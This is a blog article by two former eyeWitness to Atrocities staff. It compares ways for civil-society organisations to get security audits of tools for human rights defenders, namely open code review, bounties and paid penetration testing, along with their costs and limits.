17 July 2020
© Photo by Jon Moore on Unsplash
Attacks against human rights defenders have been on the rise in recent years, in both the physical and digital domains. While no device or account is unhackable, good cyber security practices, like the tactics proposed in the Digital First Aid Kit or Surveillance Self Defense, can at least make penetrating a system more resource-intensive. However, even strong cyber security hygiene will be less effective, or even hopeless, if the tools used by human rights defenders have vulnerabilities in the code that can be weaponised..
This blog post offers some options to organisations creating public interest technology that want to ensure the software they develop undergoes a rigorous security audit. We explain the advantages and disadvantages each approach brings and highlight some of the limitations faced by organizations with small budgets or teams. We conclude with recommendations to donors and developers to push for stronger and more accessible security practices when building tools for civil society.
Regardless of the option chosen by the organisation behind the tool, it is also key that users of public interest technology understand each of the approaches we outline below. Above all, users should appreciate the strengths and weaknesses of each alternative to determine what fits their risk profile.
This post does not cover cyber security practices that app users and their organisations should consider. Organisations should think about their security in a broad sense, ensuring that team members have basic security skills, shared infrastructure is scrutinised, and resources are dedicated to security. For groups who need support thinking through these kinds of challenges, The Engine Room’s light-touch support might be a good resource.
All systems have vulnerabilities, but many of them may not be obvious. Some vulnerabilities may open the system up to receiving a lot of damage, even if from the user’s perspective the app works without a hitch. Commercial companies often have their own internal cyber security teams whose job is to find flaws in the code and patch them before a hacker can exploit them.
Establishing an internal unit gives direct control to the developers, but assembling the right team is resource-intensive and costly. As such, in-house testing is not often feasible for smaller or less well-resourced organisations developing public interest technology. An alternative option is to outsource these services, for instance by opening the code or contracting expertise.
An organisation may opt to open the code to the public for analysis. This can be done, for example, by uploading it to GitHub and sharing it for review. This is the most affordable option and can be a good way of obtaining external opinions. When the source code is open, anyone can inspect it and search for vulnerabilities—such as a backdoor that may be sending private information to a third party. If someone identifies a vulnerability, it can help other NGOs in the human rights community, who normally do not have the capacity or resources to conduct such analysis, before they start using the software.
However, both the app developers and users will still have to assess the skills of the individual who audited the code and will hold no control over the thoroughness, quality or frequency of the testing—or whether the code is tested at all. Most of the apps created for human rights defenders and other small communities are niche and their use is restricted to a few thousand users. Organisations can increase the chance of having their code successfully tested by reaching out to supporters, peers and open source communities. Still, this option may not attract the attention of cyber security experts, who tend to evaluate software or apps that have a wider reach.
Bounty-type programs might incentivise cyber security experts from other communities to audit the code. The “bounty” (or reward for reviewing the code) can be a token of appreciation, like a t-shirt or public recognition. However, the success of this will depend on the reputation of an organisation or its tool. It can be hard to attract skilful testing and reporting, particularly if there is not a monetary reward.
Alternatively, organisations can turn to a specialised company for a review or audit of the code. For organisations developing apps, hiring penetration testers (also called pen-testers or ethical hackers) is an effective way of testing the strength of the code. A pen-test purposefully attacks a computer system, network, or application to reveal vulnerabilities that could lead to a security breach or disclosure of sensitive data. Generally, the results are captured in a report with insights that can improve the security of the system evaluated.
Contracting a company with a solid reputation can ensure thorough and as frequent as needed audits. Organisations should bear in mind that the fees can be high. Unlike other sectors, like the legal profession, IT security has not yet developed a culture of pro bono work. Even with a NGO discount, ethical hacking services can cost a few thousand US dollars for a consult, so it’s important to do thorough due diligence before contracting an external company. This can include checking the certifications the company holds, talking to previous customers and querying about their internal security (since they will store highly sensitive data detailing the organisation’s vulnerabilities). Additionally, it is important to ask questions about the types of pen-testing the company conducts and how they will transmit the results, and whether they offer support for implementing any corrective actions needed.
When contracting external expertise, organisations may consider publishing the findings. Before doing so, it’s important to check the terms of the contract, as some companies may not allow publication of the full report. While putting out the document, or part of it, can be beneficial to users, security audit reports can be quite technical and difficult to understand. In practice, users may end up relying on your organisation’s word about the soundness of the code or the pen-tester’s reputation.
As we’ve discussed above, many routes for accessing a security audit can be beyond the reach of small and/or under-resourced organisations. Addressing these limitations is the responsibility not just of the organisations themselves, but others within the ecosystem, too. Below are some recommendations to make security testing more widely accessible.
Recommendations for civil society organisations developing public interest technology, in particular tools for human rights defenders and other communities at risk
The responsibility for building secure non-profit tools does not lie only with NGOs and civil society, but also with funders. To contribute to stronger tools, funders can:
This article, authored by Wendy Betts, former Director at eyeWitness to Atrocities, and Raquel Vazquez Llorente, former Senior Legal Advisor at eyeWitness to Atrocities, was originally published on The Engine Room.